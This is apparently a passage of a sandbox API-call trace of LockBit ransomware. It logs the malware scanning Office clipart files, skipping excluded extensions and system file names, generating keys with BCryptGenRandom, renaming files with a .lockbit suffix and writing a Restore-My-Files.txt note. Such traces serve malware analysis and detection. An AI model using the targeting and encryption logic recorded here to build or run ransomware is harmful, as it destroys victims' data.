(lpString1=".mp3", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.647] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01006_.WMF") returned -1 [0177.647] lstrcmpiW (lpString1="ntldr", lpString2="SY01006_.WMF") returned -1 [0177.647] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01006_.WMF") returned -1 [0177.647] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01006_.WMF") returned -1 [0177.648] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01006_.WMF") returned -1 [0177.648] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01006_.WMF") returned 1 [0177.648] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01006_.WMF") returned -1 [0177.648] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.648] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01006_.WMF") returned=".WMF" [0177.648] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.648] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.648] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.649] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.649] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.649] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.649] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.649] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.649] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.649] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01006_.WMF.lockbit") returned 72 [0177.649] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01006_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01006_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.650] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.650] malloc (_Size=0x40068) returned 0x3df0008 [0177.650] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1588) returned 1 [0177.650] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.651] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.651] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.651] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.651] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.651] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01006_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01006_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.716] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.716] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.718] free (_Block=0x1fa2ed8) [0177.718] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01006_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.718] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.718] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x865cd000, ftCreationTime.dwHighDateTime=0x1bd4be7, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x865cd000, ftLastWriteTime.dwHighDateTime=0x1bd4be7, nFileSizeHigh=0x0, nFileSizeLow=0x2734, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01252_.WMF", cAlternateFileName="")) returned 1 [0177.718] lstrcmpiW (lpString1=".", lpString2="SY01252_.WMF") returned -1 [0177.718] lstrcmpiW (lpString1="..", lpString2="SY01252_.WMF") returned -1 [0177.718] PathFindExtensionW (pszPath="SY01252_.WMF") returned=".WMF" [0177.718] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.718] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.718] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.718] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.718] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.719] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.719] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.720] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01252_.WMF") returned -1 [0177.720] lstrcmpiW (lpString1="ntldr", lpString2="SY01252_.WMF") returned -1 [0177.720] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01252_.WMF") returned -1 [0177.720] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01252_.WMF") returned -1 [0177.720] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01252_.WMF") returned -1 [0177.720] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01252_.WMF") returned 1 [0177.720] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01252_.WMF") returned -1 [0177.721] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.721] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01252_.WMF") returned=".WMF" [0177.721] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.721] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.721] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.722] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.722] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01252_.WMF.lockbit") returned 72 [0177.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01252_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.724] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.724] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.724] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10036) returned 1 [0177.724] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.725] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.725] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.725] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.725] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0177.727] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01252_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01252_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.727] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.727] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.728] free (_Block=0x1fa2ed8) [0177.729] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01252_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.729] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.729] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.729] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852ba300, ftCreationTime.dwHighDateTime=0x1bd4be7, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x852ba300, ftLastWriteTime.dwHighDateTime=0x1bd4be7, nFileSizeHigh=0x0, nFileSizeLow=0x78a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01253_.WMF", cAlternateFileName="")) returned 1 [0177.729] lstrcmpiW (lpString1=".", lpString2="SY01253_.WMF") returned -1 [0177.729] lstrcmpiW (lpString1="..", lpString2="SY01253_.WMF") returned -1 [0177.729] PathFindExtensionW (pszPath="SY01253_.WMF") returned=".WMF" [0177.729] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.729] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.730] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.730] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01253_.WMF") returned -1 [0177.731] lstrcmpiW (lpString1="ntldr", lpString2="SY01253_.WMF") returned -1 [0177.731] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01253_.WMF") returned -1 [0177.731] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01253_.WMF") returned -1 [0177.731] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01253_.WMF") returned -1 [0177.731] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01253_.WMF") returned 1 [0177.731] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01253_.WMF") returned -1 [0177.731] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.731] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01253_.WMF") returned=".WMF" [0177.731] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.731] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.731] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.732] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.733] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01253_.WMF.lockbit") returned 72 [0177.733] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01253_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01253_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0177.734] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.734] malloc (_Size=0x40068) returned 0x3d70450 [0177.734] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=1930) returned 1 [0177.734] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.735] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.735] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.735] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01253_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01253_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.781] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.781] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.787] free (_Block=0x1fa2ed8) [0177.787] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01253_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 